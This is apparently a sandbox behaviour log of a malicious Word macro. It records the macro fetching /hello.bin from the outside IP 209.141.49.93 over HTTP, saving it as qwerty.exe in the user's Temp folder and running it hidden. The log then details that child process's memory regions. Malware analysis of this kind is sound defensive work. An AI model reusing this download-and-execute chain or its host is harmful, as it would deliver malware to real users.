Module Get Address module_name = Unknown module name, function = VarFormatNumber, address_out = 0x7fefe999990 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarFormatPercent, address_out = 0x7fefe999890 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarFormatCurrency, address_out = 0x7fefe999770 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarWeekdayName, address_out = 0x7fefe97b8d0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarMonthName, address_out = 0x7fefe97b800 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarAdd, address_out = 0x7fefe9948e0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarAnd, address_out = 0x7fefe999470 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarCat, address_out = 0x7fefe9996a0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarDiv, address_out = 0x7fefe992fe0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarEqv, address_out = 0x7fefe999cf0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarIdiv, address_out = 0x7fefe998ff0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarImp, address_out = 0x7fefe999c00 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarMod, address_out = 0x7fefe998e60 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarMul, address_out = 0x7fefe993690 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarOr, address_out = 0x7fefe9992d0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarPow, address_out = 0x7fefe992e80 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarSub, address_out = 0x7fefe993f90 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarXor, address_out = 0x7fefe9991a0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarAbs, address_out = 0x7fefe977c30 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarFix, address_out = 0x7fefe977a60 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarInt, address_out = 0x7fefe977890 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarNeg, address_out = 0x7fefe977ea0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarNot, address_out = 0x7fefe999600 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarRound, address_out = 0x7fefe9776a0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarCmp, address_out = 0x7fefe9983f0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarDecAdd, address_out = 0x7fefe943070 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarDecCmp, address_out = 0x7fefe94d700 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarBstrCat, address_out = 0x7fefe94d890 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarCyMulI4, address_out = 0x7fefe92caf0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarBstrCmp, address_out = 0x7fefe938a00 True 1
Fn
System Get Time type = Local Time, time = 2018-06-04 08:51:32 (Local Time) True 2
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = RequireDeclaration, data = 138, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = CompileOnDemand, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = NotifyUserBeforeStateLoss, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = BackGroundCompile, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = BreakOnAllErrors, data = 255, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = BreakOnServerErrors, data = 0, type = REG_NONE False 1
Fn
Module Get Address module_name = Unknown module name, address_out = 0x7fee2c9fcd0 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\409 False 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\9 False 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 True 1
Fn
Registry Read Value reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64, data = C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB True 1
Fn
Module Get Filename process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 True 1
Fn
Registry Read Value reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64, data = C:\Windows\system32\stdole2.tlb True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 True 1
Fn
Registry Read Value reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64, data = C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046} True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046} True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046} True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046}\4.2 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046}\4.2\9 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046}\4.2\9\win64 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046}\4.2\9 True 1
Fn
Registry Read Value reg_name = HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046}\4.2\9\win64, data = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 True 1
Fn
Registry Read Value reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64, data = C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 True 1
Fn
Registry Read Value reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64, data = C:\Windows\system32\stdole2.tlb True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 True 1
Fn
Registry Read Value reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64, data = C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{0D452EE1-E08F-101A-852E-02608C4D0BB4} True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\TypeLib\{0D452EE1-E08F-101A-852E-02608C4D0BB4} True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{0D452EE1-E08F-101A-852E-02608C4D0BB4}\2.0 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{0D452EE1-E08F-101A-852E-02608C4D0BB4}\2.0\0 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{0D452EE1-E08F-101A-852E-02608C4D0BB4}\2.0\0\win64 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{0D452EE1-E08F-101A-852E-02608C4D0BB4}\2.0\0 True 1
Fn
Registry Read Value reg_name = HKEY_CLASSES_ROOT\TypeLib\{0D452EE1-E08F-101A-852E-02608C4D0BB4}\2.0\0\win64, data = C:\Windows\system32\FM20.DLL True 1
Fn
System Get Time type = Local Time, time = 2018-06-04 08:51:33 (Local Time) True 1
Fn
COM Create interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER True 1
Fn
System Get Cursor x_out = 1188, y_out = 885 True 1
Fn
System Get Time type = Local Time, time = 2018-06-04 08:51:33 (Local Time) True 2
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\409 False 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\9 False 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 True 1
Fn
Registry Read Value reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64, data = C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB True 1
Fn
System Get Time type = Local Time, time = 2018-06-04 08:51:33 (Local Time) True 1
Fn
Module Get Filename process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 True 1
Fn
System Get Cursor x_out = 1188, y_out = 885 True 1
Fn
System Get Time type = Local Time, time = 2018-06-04 08:51:33 (Local Time) True 4
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\Typelib True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\Typelib\{0D452EE1-E08F-101A-852E-02608C4D0BB4} True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\Typelib\{0D452EE1-E08F-101A-852E-02608C4D0BB4} True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\Typelib\{0D452EE1-E08F-101A-852E-02608C4D0BB4} False 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\Clsid\{82B02373-B5BC-11CF-810F-00A0C9030074} True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\Clsid\{82B02373-B5BC-11CF-810F-00A0C9030074}\Control False 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\Clsid\{82B02373-B5BC-11CF-810F-00A0C9030074}\Insertable False 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\Clsid\{82B02374-B5BC-11CF-810F-00A0C9030074} True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\Clsid\{82B02374-B5BC-11CF-810F-00A0C9030074}\Control False 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\Clsid\{82B02374-B5BC-11CF-810F-00A0C9030074}\Insertable False 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\Clsid\{82B02375-B5BC-11CF-810F-00A0C9030074} True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\Clsid\{82B02375-B5BC-11CF-810F-00A0C9030074}\Control False 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\Clsid\{82B02375-B5BC-11CF-810F-00A0C9030074}\Insertable False 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\Clsid\{8A683C92-BA84-11CF-8110-00A0C9030074} True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\Clsid\{8A683C92-BA84-11CF-8110-00A0C9030074}\Control False 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\Clsid\{8A683C92-BA84-11CF-8110-00A0C9030074}\Insertable False 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\Clsid\{8A683C93-BA84-11CF-8110-00A0C9030074} True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\Clsid\{8A683C93-BA84-11CF-8110-00A0C9030074}\Control False 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\Clsid\{8A683C93-BA84-11CF-8110-00A0C9030074}\Insertable False 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\Clsid\{1C3B4210-F441-11CE-B9EA-00AA006B1A69} True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\Clsid\{1C3B4210-F441-11CE-B9EA-00AA006B1A69}\Control False 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\Clsid\{1C3B4210-F441-11CE-B9EA-00AA006B1A69}\Insertable False 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\Clsid\{909E0AE0-16DC-11CE-9E98-00AA00574A4F} True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\Clsid\{909E0AE0-16DC-11CE-9E98-00AA00574A4F}\Control False 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\Clsid\{909E0AE0-16DC-11CE-9E98-00AA00574A4F}\Insertable False 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\Clsid\{AFC20920-DA4E-11CE-B943-00AA006887B4} True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\Clsid\{AFC20920-DA4E-11CE-B943-00AA006887B4}\Control False 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\Clsid\{AFC20920-DA4E-11CE-B943-00AA006887B4}\Insertable False 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\Clsid\{5CEF5610-713D-11CE-80C9-00AA00611080} True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\Clsid\{5CEF5610-713D-11CE-80C9-00AA00611080}\Control False 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\Clsid\{5CEF5610-713D-11CE-80C9-00AA00611080}\Insertable False 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\Clsid\{646BE917-EFED-46C6-AFC9-CA1FBD3C5100} True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\Clsid\{646BE917-EFED-46C6-AFC9-CA1FBD3C5100}\Control False 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\Clsid\{646BE917-EFED-46C6-AFC9-CA1FBD3C5100}\Insertable False 1
Fn
Module Load module_name = oleaut32.dll, base_address = 0x7fefe910000 True 1
Fn
Module Get Address module_name = Unknown module name, function = RegisterTypeLibForUser, address_out = 0x7fefe966430 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = VbaCapability, data = 234 False 1
Fn
Module Load module_name = VBE7.DLL, base_address = 0x7fee3470000 True 1
Fn
Module Get Address module_name = Unknown module name, function = 716, address_out = 0x7fee37b24c8 True 1
Fn
Module Load module_name = VBE7.DLL, base_address = 0x7fee3470000 True 1
Fn
Module Get Address module_name = Unknown module name, function = 698, address_out = 0x7fee35db230 True 1
Fn
Module Load module_name = VBE7.DLL, base_address = 0x7fee3470000 True 1
Fn
Module Get Address module_name = Unknown module name, function = 581, address_out = 0x7fee35da6c8 True 1
Fn
Module Load module_name = VBE7.DLL, base_address = 0x7fee3470000 True 1
Fn
Module Get Address module_name = Unknown module name, function = 666, address_out = 0x7fee3513528 True 1
Fn
Module Load module_name = VBE7.DLL, base_address = 0x7fee3470000 True 1
Fn
Module Get Address module_name = Unknown module name, function = 600, address_out = 0x7fee3574ee0 True 1
Fn
COM Get Class ID cls_id = ED8C108E-4349-11D2-91A4-00C04F7969E8, prog_id = Microsoft.XMLHTTP True 1
Fn
COM Create interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS True 1
Fn
Inet Open Connection protocol = http, server_name = 209.141.49.93, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /hello.bin True 1
Fn
Inet Send HTTP Request url = http://209.141.49.93/hello.bin True 1
Fn
Inet Read Response size_out = 238601 True 1
Fn
Data
Inet Receive HTTP Status status = 200 True 1
Fn
COM Get Class ID cls_id = 00000566-0000-0010-8000-00AA006D2EA4, prog_id = ADODB.Stream True 1
Fn
COM Create interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Inet Read Response size_out = 238601 True 1
Fn
Data
File Create filename = C:\Users\aETAdzjz\AppData\Local\Temp\qwerty.exe True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Local\Temp\qwerty.exe, size = 238601 True 1
Fn
Data
Process Create process_name = C:\Users\aETAdzjz\AppData\Local\Temp\qwerty.exe, os_pid = 0xa44, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
System Get Cursor x_out = 636, y_out = 820 True 1
Fn
Process #2: qwerty.exe
9277 35
»
Information Value
ID #2
File Name c:\users\aetadzjz\appdata\local\temp\qwerty.exe
Command Line C:\Users\aETAdzjz\AppData\Local\Temp\qwerty.exe
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:00:31, Reason: Child Process
Unmonitor End Time: 00:05:20, Reason: Terminated by Timeout
Monitor Duration 00:04:49
OS Process Information
»
Information Value
PID 0xa44
Parent PID 0x924 (c:\program files\microsoft office\root\office16\winword.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x A48
0x A50
0x A54
0x A58
0x A60
0x A68
0x A6C
0x A70
0x A74
0x A78
0x A7C
0x AFC
0x B00
0x B24
0x 890
0x 90C
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
private_0x0000000000050000 0x00050000 0x00050fff Private Memory Readable, Writable True False False -
private_0x0000000000050000 0x00050000 0x0005ffff Private Memory Readable, Writable True False False -
private_0x0000000000060000 0x00060000 0x00060fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000060000 0x00060000 0x00066fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000070000 0x00070000 0x00070fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000070000 0x00070000 0x00076fff Pagefile Backed Memory Readable True False False -
private_0x0000000000080000 0x00080000 0x00080fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000090000 0x00090000 0x00091fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000000a0000 0x000a0000 0x000a0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000000b0000 0x000b0000 0x000effff Private Memory Readable, Writable True False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory Readable, Writable True False False -
private_0x0000000000100000 0x00100000 0x00100fff Private Memory Readable, Writable True False False -
private_0x0000000000110000 0x00110000 0x00110fff Private Memory Readable, Writable True False False -
private_0x0000000000120000 0x00120000 0x00120fff Private Memory Readable, Writable True False False -
private_0x0000000000130000 0x00130000 0x00130fff Private Memory Readable, Writable True False False -
private_0x0000000000140000 0x00140000 0x00140fff Private Memory Readable, Writable True False False -
private_0x0000000000150000 0x00150000 0x00150fff Private Memory Readable, Writable True False False -
private_0x0000000000160000 0x00160000 0x00160fff Private Memory Readable, Writable True False False -
private_0x0000000000170000 0x00170000 0x00170fff Private Memory Readable, Writable True False False -
private_0x0000000000180000 0x00180000 0x00180fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False -
locale.nls 0x001a0000 0x00206fff Memory Mapped File Readable False False False -
private_0x0000000000210000 0x00210000 0x00210fff Private Memory Readable, Writable True False False -
private_0x0000000000220000 0x00220000 0x0029ffff Private Memory Readable, Writable True False False -
private_0x00000000002a0000 0x002a0000 0x002bafff Private Memory Readable, Writable, Executable True False False -
private_0x00000000002c0000 0x002c0000 0x002e6fff Private Memory Readable, Writable True False False -
private_0x00000000002c0000 0x002c0000 0x002fffff Private Memory Readable, Writable True False False -
private_0x00000000002c0000 0x002c0000 0x002d6fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000002e0000 0x002e0000 0x002e0fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000002e0000 0x002e0000 0x002effff Private Memory Readable, Writable True False False -
pagefile_0x00000000002e0000 0x002e0000 0x002e6fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000002f0000 0x002f0000 0x002fffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000300000 0x00300000 0x003defff Pagefile Backed Memory Readable True False False -
private_0x00000000003e0000 0x003e0000 0x003effff Private Memory Readable, Writable True False False -
pagefile_0x00000000003f0000 0x003f0000 0x003f6fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000003f0000 0x003f0000 0x003f1fff Pagefile Backed Memory Readable True False False -
qwerty.exe 0x00400000 0x00448fff Memory Mapped File Readable, Writable, Executable True True False
private_0x0000000000450000 0x00450000 0x0048ffff Private Memory Readable, Writable True False False -
private_0x0000000000490000 0x00490000 0x004cffff Private Memory Readable, Writable True False False -
rsaenh.dll 0x00490000 0x004cbfff Memory Mapped File Readable False False False -
pagefile_0x0000000000490000 0x00490000 0x004cafff Pagefile Backed Memory Readable, Writable True False False -
